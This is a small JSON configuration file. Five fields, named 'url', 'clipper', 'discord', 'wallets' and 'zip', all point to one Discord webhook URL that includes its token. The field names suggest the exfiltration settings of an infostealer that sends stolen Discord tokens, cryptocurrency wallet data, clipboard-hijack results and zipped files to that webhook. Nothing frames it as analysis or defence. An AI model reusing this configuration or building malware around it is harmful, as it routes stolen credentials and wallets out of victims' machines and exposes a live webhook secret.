{
    "url": "https://discord.com/api/webhooks/985915232541085777/xg6Bf0LopOoxKqcKuwJu57MjdYkZ2GnlCT2e8mgXF88J9kZ72U2k5hNMAZxo9DX2QcZN",
    "clipper": "https://discord.com/api/webhooks/985915232541085777/xg6Bf0LopOoxKqcKuwJu57MjdYkZ2GnlCT2e8mgXF88J9kZ72U2k5hNMAZxo9DX2QcZN",
    "discord": "https://discord.com/api/webhooks/985915232541085777/xg6Bf0LopOoxKqcKuwJu57MjdYkZ2GnlCT2e8mgXF88J9kZ72U2k5hNMAZxo9DX2QcZN",
    "wallets": "https://discord.com/api/webhooks/985915232541085777/xg6Bf0LopOoxKqcKuwJu57MjdYkZ2GnlCT2e8mgXF88J9kZ72U2k5hNMAZxo9DX2QcZN",
    "zip": "https://discord.com/api/webhooks/985915232541085777/xg6Bf0LopOoxKqcKuwJu57MjdYkZ2GnlCT2e8mgXF88J9kZ72U2k5hNMAZxo9DX2QcZN"
}
